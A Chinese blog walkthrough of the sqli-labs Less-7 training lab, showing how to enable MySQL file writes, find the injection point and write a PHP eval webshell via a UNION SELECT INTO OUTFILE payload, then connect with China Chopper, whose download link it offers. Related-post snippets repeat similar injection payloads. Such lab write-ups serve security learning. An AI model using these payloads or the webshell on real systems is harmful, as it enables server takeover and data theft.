sqli-lab教程Less-7

最新推荐文章于 2022-07-24 14:29:57 发布
最新推荐文章于 2022-07-24 14:29:57 发布
阅读量461 收藏 1
点赞数 2
分类专栏: # sqli注入 文章标签: mysql 数据库 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lq56789/article/details/115127776
版权

Less-7

将一句话木马写入目录中,使用中国菜刀连接,拿到shell。
1.开启写入权限

使用show variables like '%secure%'在MySQL命令行中判断

show variables like '%secure%';

如果这里为Null就没有写入权限

在这里插入图片描述

2.如何修改本地写入权限

通过修改 MySQL 下的 my.ini 配置文件就可以启用权限,需要把下面这个字符串写入文件中。

secure_file_priv="/"

再次查看此参数,若参数值不为 null 则修改成功。

3.判断注入

使用单引号报错,但使用- - +注释符未回显正常,继续探测…
当使用单引号+双括号探测时,使用- -+回显正常,成功找到注入点。
在这里插入图片描述
使用into outfile写入函数将一句话木马写入

?id=1')) union select 1,2,'<?php @eval($_POST["caidao"]);?>' into outfile "写入自己的路径"--+

在这里插入图片描述

WebShell

使用中国菜刀连接
在这里插入图片描述
连接成功
在这里插入图片描述
还可以使用终端打开,可见一句话被写入的危害。
在这里插入图片描述
中国菜刀安装包(此包从GitHub下载无后门):
https://pan.baidu.com/s/1MCY4TDR_xJwZPFKKvse4Ig
提取码:nw6x

有志者,事竟成!希望你学有所成,加油吧!♥♥♥

如文章有错误感谢指出,联系Q:2181796086

如文章有帮助点赞关注一下吧!

Brucye
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-lab教程——Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)
luosaierdadi的博客
07-08 312
几次尝试,不难猜出注释符被过滤了,但是看看题目:less 7 GET - Dump into outfile - String (导出文件GET字符型注入)所以大概要使用文件导出。我投机取巧了,找了个简单题less-2直接注入拿到路径,方便导出。这里插个小扩展:winserver的iis默认路径c:\Inetpub\wwwrootlinux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等ap
从零记录sqli-labs学习过程sqli-labs Less-7
fpxnb1的博客
03-30 3811
还是两种办法,但第二种方法用到菜刀连接时候出现了问题,还没有搞好,先更新了思路
Sqli-labs Less7
orchid_sea的博客
07-24 1229
这里还有一个需要了解的点就是在mysql5.5版本之前secure_file_priv这个值是默认为空的,那么我们拿到的webshell如果对应的mysql数据库版本在5.5以下的话操作起来就比较方便,在mysql5.5版本之后secure_file_priv这个值是默认为NULL的,即不能够往数据库内写入文件。/tmp的意思是只能在/tmp目录下写入文件,这种情况下就需要考虑写入文件到文件夹后能否在网页上访问连接到这个目录,在MYSQL的bin目录下进入cmd,查看MySQL的权限设置。...
SQLI_LAB——Less7~15
weixin_34050005的博客
05-25 172
  LESS-7   上题。 http://localhost:81/SQLI-LABS/sqli-labs-master/Less-7/?id=1' --+      单引号发现报错,但不是外显,所以无法直接进行剥离构造。没有外显的话比较麻烦,通过尝试得到: http://localhost:81/SQLI-LABS/sqli-labs-master/Less-7/?...
Linux下sql_labs第七关,SQL注入之Sqli-labs系列第二十七关(过滤空格、注释符、union select)和第二十七A...
weixin_35158372的博客
05-16 411
开始挑战第二十七关(Trick with SELECT & UNION)第二十七A关(Trick with SELECT & UNION)0x1看看源代码(1)与26关一样,这次去除了逻辑运算符添加了union seclet。0x2测试(1)同样利用26关的方式,采取%a0来代替空格(2) 这里过滤了union select ,所以我们采用大小写方式去绕过,双写是不行的(3)获取数...
sqli-lab通关txt
07-22
sqli-lab1~10的通关txt,其中包含了注入代码以及相关注解 代码由于存储在txt中,无法直接复制使用,请手打。 (可能是由于编码问题)
第三节 Sqli-lab环境搭建-01
09-15
第三节 Sqli-lab环境搭建-01
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
phpstudy+靶场sqli-labs-master下载
sqli-lab注入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs(5到7关)
gclome的博客
07-10 2343
sqli-labs-master(5-7关) 参考资料:https://www.jianshu.com/p/a3287fbb20f1 Less-5(双注入GET单引号字符型注入) 方法:双注入或盲注 双查询注入顾名思义形式上是两个嵌套的查询,即select …(select …),里面的那个select被称为子查询,他的执行顺序也是先执行子查询,然后再执行外面的select,双注入主要涉及到了几个...
sqli-lab注入七
chuxuezheerer的博客
10-06 243
Less-7 GET - Dump into outfile - String (导出文件GET字符型注入) 这道题 利用文件导入时还要注意对数据库进行权限测试:正确回显 http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) and (select count(*) from mysql.user)>0 --+ 之后进行into outfil...
sqli-labs ————less -7
Fly_鹏程万里
05-11 4159
Less-7打开关卡网页之后,根据提示传入参数id,数据类型为numeric,之后可以看到如上的提示信息,在提示信息中给出了让我们使用outfile的提示,那么我们还是先来看看源码吧:关键sql代码:$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; $result=mysql_query($sql);可以看出这里对传入的参数id进行了...
sqli lab php7,sqli-lab 通关指南:Less 7
weixin_33895274的博客
03-24 243
目录开启文件读写权限MySql 使用 secure-file-priv 参数对文件读写进行限制,当参数值为 null 时无法进行文件导出操作。使用这条命令可以查看:show variables like '%secure%';通过修改 MySQL 下的 my.ini 配置文件就可以启用权限,需要把下面这个字符串写入文件中。secure_file_priv="/"再次查看此参数,若参数值不为 nul...
sqli lab php7,SQLI-Lab实验
weixin_32334209的博客
03-24 149
最近入职培训了一段时间,感觉自己安全基础还是不够牢固,从头开始学习吧,把《白帽子学Web安全》在看几遍,也给自己立个Flag:每周至少研究一个漏洞的源码,产出报告。这周把sqli-labs的题目都做一遍,写一遍payload。Page-1Less-1:http://localhost/sqli-labs-php7/Less-1/?id=-1' union select 1,group_concat...
less-7】sqli-labs靶场第七关(类似less-5)
未名编程
07-20 283
第七关 和第五关相比单引号和双括号,简单构造 一下即可 https://sqli.wmcoder.site/sqli-labs/Less-7?id=1')) and ord(mid((select IFNULL(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68--+
SQLI-LAB  的 实战记录(Less 1 - Less 10)
这块盾牌有待改良
07-15 3286
Less - 1 Error Based- String Less - 2 Error Based- Intiger Less - 3 Error Based- String with Twist
sqli-labs Lesson-7详细过程(文件输出插入webshell和菜刀初级使用)
Brad_的博客
10-19 1015
第七节算是比较进阶的,通过文件输入插入webshell,然后使用菜刀进入服务器管理。
sqli-labs学习sql注入
qq_46041723的博客
02-29 315
sqli-labs的安装和配置 下载sqli-labs和phpstudy(注意PHP study版本不能高于8.0,不然容易出错,本人就是PHP study版本高了,一直出错) 下载完成后将sqli-labs解压放在PHP study的WWW文件夹下 打开sqli-labs-master\sql-connections,在里面有一个db-creds.inc文档,打开编辑 一般默认用户名、密码都...
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:https://github.com/Audi-1/sqli-labs 。 3. 将下载的代码解压缩到您的Web服务器的根目录下。 4. 创建一个MySQL数据库,并导入提供的SQL文件。您可以在"sqli-labs/db-creds.inc"文件中找到数据库凭据。将该文件重命名为"db-creds.inc.php"并填写正确的数据库信息。 5. 现在,您应该能够通过访问"http://your-server-ip/sqli-labs/"来访问sqli-lab。 请注意,sqli-lab是一个用于学习和测试SQL注入漏洞的实验室环境。确保在安装和使用过程中采取适当的安全措施,不要将其用于非法目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Brucye

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值